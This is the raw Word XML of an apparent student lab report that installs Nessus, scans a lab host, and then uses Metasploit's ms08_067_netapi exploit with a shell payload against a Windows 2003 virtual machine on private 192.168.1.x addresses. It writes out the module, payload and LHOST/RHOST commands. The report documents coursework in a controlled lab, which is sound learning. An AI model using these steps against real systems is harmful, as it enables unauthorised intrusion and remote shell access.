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C2C" w:rsidRDefault="003C0C2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E96AE9" w:rsidRDefault="002A616C" w:rsidP="00E96A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A616C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To install Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96AE9" w:rsidRPr="00E96AE9" w:rsidRDefault="00E96AE9" w:rsidP="00E96AE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96AE9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8" w:history="1">
        <w:r w:rsidRPr="00E96AE9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.tenable.com/products/nessus-home/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E96AE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96AE9" w:rsidRDefault="00E96AE9" w:rsidP="00E96AE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E96AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>egister for an activation code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C15FE" w:rsidRDefault="00E96AE9" w:rsidP="00E96AE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latest version of Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C15FE" w:rsidRPr="002C15FE" w:rsidRDefault="002C15FE" w:rsidP="00E96AE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dpkg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6AE9" w:rsidRPr="002C15FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–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C15FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nessus-8.2.2-debian6_</w:t>
      </w:r>
      <w:r w:rsidR="00E96AE9" w:rsidRPr="002C15FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96AE9" w:rsidRPr="00E96AE9" w:rsidRDefault="002A616C" w:rsidP="00E96A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Ne</w:t>
      </w:r>
      <w:r w:rsidR="00E96AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssus with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96AE9" w:rsidRPr="00E96AE9" w:rsidRDefault="00E96AE9" w:rsidP="00E96AE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96A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4E27E" wp14:editId="02D1EC65">
            <wp:extent cx="5143500" cy="1394659"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1" name="Picture 1" descr="Macintosh HD:Users:Kelli:Desktop:Screen Shot 2019-03-10 at 4.51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lli:Desktop:Screen Shot 2019-03-10 at 4.51.3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67" cy="13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5FE" w:rsidRDefault="00E96AE9" w:rsidP="002A61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Nessus has started, o</w:t>
      </w:r>
      <w:r w:rsidR="003B69B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pen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3B69B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nternet browser and go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="003B69B0" w:rsidRPr="00AD6BD8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://kali:8834</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C15FE" w:rsidRPr="002C15FE" w:rsidRDefault="002C15FE" w:rsidP="002C1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should then see a SSL certificate warning. You will need to add the exception and confirm the exception.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B69B0" w:rsidRDefault="003B69B0" w:rsidP="002C1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into Nessus with username and password when registered</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A616C" w:rsidRDefault="003B69B0" w:rsidP="002C1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Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="003B69B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Basic Network S</w:t>
      </w:r>
      <w:r w:rsidR="002A616C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00E96AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E96AE9" w:rsidRPr="00E96AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00E96AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enter IP addr</w:t>
      </w:r>
      <w:r w:rsidR="00B90981">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ess of target machine (192.168.1.124</w:t>
      </w:r>
      <w:r w:rsidR="00E96AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96AE9" w:rsidRDefault="00E96AE9" w:rsidP="002C1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Launch</w:t>
      </w:r>
      <w:r w:rsidR="00AC1DFB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vulnerability scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77385" w:rsidRPr="00AC1DFB" w:rsidRDefault="00AC1DFB" w:rsidP="00AC1D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SEE ATTACHED </w:t>
      </w:r>
      <w:r w:rsidR="00041BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PDF SCAN REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77385" w:rsidRDefault="00B77385">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1DFB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0B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Kali VM </w:t>
      </w:r>
      <w:r w:rsidR="00490B27" w:rsidRPr="00490B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00490B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> go to applications on the top </w:t>
      </w:r>
      <w:r w:rsidR="00490B27" w:rsidRPr="00490B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00490B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scroll down to exploitation tools </w:t>
      </w:r>
      <w:r w:rsidR="00490B27" w:rsidRPr="00490B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="0049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B27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F04B9E" w:rsidRPr="00AC1DFB" w:rsidRDefault="00490B27" w:rsidP="00F04B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Then a terminal will pop up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be</w:t>
      </w:r>
      <w:r w:rsidR="00472144">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> initialized and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>configured</w:t>
      </w:r>
      <w:r w:rsidR="00F04B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89A54" wp14:editId="6D7571DD">
            <wp:extent cx="3429000" cy="3032498"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="Macintosh HD:private:var:folders:kl:1fc000h136gb2zyx00c6fgyr0000gn:T:TemporaryItems:Screen Shot 2019-03-12 at 6.36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kl:1fc000h136gb2zyx00c6fgyr0000gn:T:TemporaryItems:Screen Shot 2019-03-12 at 6.36.4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78" cy="303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9E" w:rsidRPr="004706EA" w:rsidRDefault="004706EA" w:rsidP="00F04B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</w:t>
      </w:r>
      <w:r w:rsidR="00F04B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I typed the command: “search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC1DFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>platform</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC1DFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AC1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DFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC1DFB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to get a list </w:t>
      </w:r>
      <w:r w:rsidR="00F04B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of explo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>its to choose from to do this lab.</w:t>
      </w:r>
      <w:r w:rsidR="00516E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I chose the ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidR="00F04B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidR="00472144">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that we talked about in class.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F04B9E" w:rsidRDefault="00F04B9E" w:rsidP="00F04B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 used this command to use the exploit that I have chosen: </w:t>
      </w:r>
      <w:r w:rsidR="00516E4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16E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00516E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00516E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00516E44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/ms08_067_netapi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575975" w:rsidRPr="00575975" w:rsidRDefault="00575975" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00575975" w:rsidRPr="00575975" w:rsidRDefault="00516E44" w:rsidP="00575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51500" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="Macintosh HD:private:var:folders:kl:1fc000h136gb2zyx00c6fgyr0000gn:T:TemporaryItems:Screen Shot 2019-03-12 at 9.51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kl:1fc000h136gb2zyx00c6fgyr0000gn:T:TemporaryItems:Screen Shot 2019-03-12 at 9.51.1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9E" w:rsidRDefault="00575975" w:rsidP="00F04B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 wa</w:t>
      </w:r>
      <w:r w:rsidR="00472144">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nted to get info about this exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so I used the “info” command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00575975" w:rsidRDefault="00575975" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00575975" w:rsidRDefault="00575975" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516E44" w:rsidRDefault="00516E44" w:rsidP="00575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19500"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="13" name="Picture 13" descr="Macintosh HD:Users:Kelli:Desktop:Screen Shot 2019-03-12 at 9.52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lli:Desktop:Screen Shot 2019-03-12 at 9.52.2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44" w:rsidRDefault="00516E44" w:rsidP="00575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378200"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="Macintosh HD:Users:Kelli:Desktop:Screen Shot 2019-03-12 at 9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elli:Desktop:Screen Shot 2019-03-12 at 9.52.4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72C" w:rsidRDefault="00472144" w:rsidP="004721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TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRPr="00FB12AF" w:rsidRDefault="004706EA" w:rsidP="004721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I</w:t>
      </w:r>
      <w:r w:rsidR="00FB12AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> need to set the payload to exploit the Windows 2003 server. I used the command: “show payloads” to view the available payloads for the windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB12AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB12AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/ms08_067_netapi exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC1DFB" w:rsidRDefault="00FB12AF" w:rsidP="00FB12A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50D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A bunch of payloads are listed, but I am going to use the payload “ windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00550D75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550D7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0D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00550D75"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FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12A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550D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Next, I used the command: s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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bind</w:t>
      </w:r>
      <w:r w:rsidRPr="00550D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRPr="00FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12A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that I have set the exploit and the payload, I need to set the options on the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12A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msf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&gt; “show options” command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12A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need to tell the payload what system I want the command shell to connect back to so I need to set the local host or LHOST to my Kali IP address with the following command: “set LHOST 192.168.1.124”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRPr="00FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12A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LPORT 30172</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3453" w:rsidRDefault="004706EA" w:rsidP="00B63F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remote host is the IP address of my Windows 2003 virtual machine. I used the command “</w:t>
      </w:r>
      <w:r w:rsidR="00550D75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B63FBC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="00FB12AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST </w:t>
      </w:r>
      <w:r w:rsidR="007767F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.125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550D75" w:rsidRDefault="00550D75" w:rsidP="00B63F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RPORT 4495</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB12AF" w:rsidRPr="00FB12AF" w:rsidRDefault="00FB12AF" w:rsidP="00FB12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172EA" wp14:editId="3562652F">
            <wp:extent cx="5943600" cy="2146300"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="18" name="Picture 18" descr="Macintosh HD:Users:Kelli:Desktop:Screen Shot 2019-03-12 at 10.0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elli:Desktop:Screen Shot 2019-03-12 at 10.06.0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210" w:rsidRPr="00872210" w:rsidRDefault="00872210" w:rsidP="0087221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send out the payload to the Windows 2003 server and return a command prompt. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA3453" w:rsidRDefault="00472144" w:rsidP="00EA34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49400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="Macintosh HD:Users:Kelli:Desktop:Screen Shot 2019-03-12 at 10.0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elli:Desktop:Screen Shot 2019-03-12 at 10.09.5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53" w:rsidRPr="00EA3453" w:rsidRDefault="00EA3453" w:rsidP="00EA3453">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00575975" w:rsidRDefault="00575975" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006803D7" w:rsidRDefault="006803D7" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006803D7" w:rsidRDefault="006803D7" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040072C" w:rsidRPr="00575975" w:rsidRDefault="0040072C" w:rsidP="00575975">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0040072C" w:rsidRPr="00575975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0981" w:rsidRDefault="00B90981" w:rsidP="002A616C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B90981" w:rsidRDefault="00B90981" w:rsidP="002A6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0981" w:rsidRDefault="00B90981" w:rsidP="002A616C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B90981" w:rsidRDefault="00B90981" w:rsidP="002A61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0981" w:rsidRPr="002A616C" w:rsidRDefault="00B90981">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="002A616C">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Kelli Kinnikin</w:t>
    </w:r>
    <w:r w:rsidRPr="002A616C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2A616C">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>CIS432-Lab3</w:t>
    </w:r>
    <w:r w:rsidRPr="002A616C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2A616C">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>3-13-19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E10A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
